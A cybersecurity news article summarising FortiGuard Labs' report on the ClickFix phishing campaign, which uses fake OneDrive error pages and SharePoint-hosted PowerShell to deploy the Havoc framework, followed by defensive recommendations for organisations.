A new and increasingly sophisticated phishing campaign known as ClickFix is targeting unsuspecting users by exploiting Microsoft SharePoint to deploy the open-source Havoc post-exploitation framework, according to a report released by Fortinet’s FortiGuard Labs. The phishing attack cleverly disguises itself using fake OneDrive error messages to lure users into executing dangerous PowerShell commands, ultimately giving attackers remote access to infected devices.
The campaign begins with phishing emails containing an HTML attachment labeled “Documents.html.” Once opened, the file displays a forged OneDrive error message—specifically error code 0x8004de86—claiming that a DNS cache issue is preventing users from accessing their files. To resolve the error, users are prompted to click a “How to fix” button. Instead of fixing anything, this button silently copies a malicious PowerShell command to the clipboard, instructing the user to paste and execute it in the Windows Command Prompt.
Once executed, the PowerShell command downloads and runs a second script hosted on a SharePoint server controlled by the attacker. This second-stage script initiates a series of actions that begin with environmental checks. The script looks for signs of a sandboxed or virtual machine environment—commonly used by researchers to analyze malware—and terminates itself if one is detected, evading detection and analysis.
If the device passes this check, the script proceeds to modify the Windows Registry, install Python (if it is not already installed), and download a Python-based script from the attacker-controlled SharePoint instance. This Python script then completes the infection process by downloading and injecting Havoc into the system. Delivered as a dynamic-link library (DLL), Havoc enables the attacker to maintain persistent control over the system, escalate privileges, move laterally within the network, and execute additional malicious operations.
One of the most alarming aspects of this campaign is its use of Microsoft Graph API for communications between the malware and the attacker’s command-and-control (C2) infrastructure. By using Graph API, the malware traffic mimics legitimate SharePoint activity, making it significantly harder for security tools to identify and flag the communication as suspicious.
ClickFix is part of a broader trend in phishing operations where threat actors are increasingly targeting cloud services and leveraging trusted platforms like Microsoft SharePoint. The campaign’s techniques reflect a rising level of sophistication, combining social engineering, stealth evasion, and advanced payload delivery mechanisms.
According to FortiGuard Labs, this campaign is also being used to deliver a variety of malware strains, including infostealers, remote access trojans (RATs), and DarkGate, a malware-as-a-service platform popular among cybercriminals. The campaign is not limited to email vectors; cybercriminals are also utilizing platforms such as Telegram, where fake identity verification services are employed to trick users into executing malicious PowerShell commands.
The scale of the threat is compounded by the growing volume of phishing attacks globally. During Q3 2023, phishing incidents surged by 173%, with a record 493.2 million attacks recorded during the quarter alone. Current estimates suggest that 1.2% of all emails sent daily—or approximately 3.4 billion emails globally—contain some form of malicious content, making phishing one of the most pervasive cybersecurity threats in today’s digital landscape.
Experts warn that as attackers continue to innovate and exploit widely trusted platforms, traditional detection systems are struggling to keep up. This makes user awareness, proactive defense strategies, and AI-powered security solutions more important than ever.
it is Cybersecurity professionals recommend several measures to help organizations defend against campaigns like ClickFix. First, employee education is essential. Staff should be trained to identify phishing attempts, especially those that urge users to run system-level commands or install software from unofficial sources.
Secondly, organizations should enforce strict access controls, apply least privilege policies, and regularly audit administrative rights to prevent attackers from gaining easy entry points into their networks. Monitoring cloud services for anomalous behaviors—such as unexpected file sharing, unusual login locations, or suspicious file downloads—is also critical in identifying threats early.
Advanced security tools like Sonar, an AI-powered phishing detection tool developed by NordVPN, are being highlighted as effective measures for detecting and blocking phishing threats before they reach end users. These tools use behavior-based analysis and machine learning to flag phishing patterns in real time, reducing the chances of successful infiltration.
Additionally, experts suggest disabling or restricting PowerShell where possible and closely monitoring its usage across endpoints. Any script attempting to modify registry settings, initiate downloads, or interact with external cloud services should be automatically flagged for review. Deploying Endpoint Detection and Response (EDR) solutions capable of real-time analysis and sandboxing can also be instrumental in stopping attacks before they do serious damage.
The ClickFix campaign underscores the evolving threat landscape where attackers no longer rely solely on suspicious attachments or sketchy URLs. Instead, they are integrating seamlessly into the tools and platforms people use every day, using those trusted channels to disguise malicious activity.
The use of Microsoft SharePoint and Graph API to host and deliver malware highlights the importance of zero-trust security models—where no application or platform is automatically trusted, and all activity is continuously verified.
As post-exploitation frameworks like Havoc become more widely used in both red teaming and real-world cyberattacks, defenders must remain agile and informed. The line between legitimate enterprise activity and malicious behavior is blurring, and vigilance is the only way to stay ahead.
Organizations are encouraged to regularly update their threat intelligence, patch vulnerable systems, and stay informed about emerging phishing techniques. With attackers refining their methods and phishing attacks reaching all-time highs, the need for robust, adaptive cybersecurity defenses has never been greater.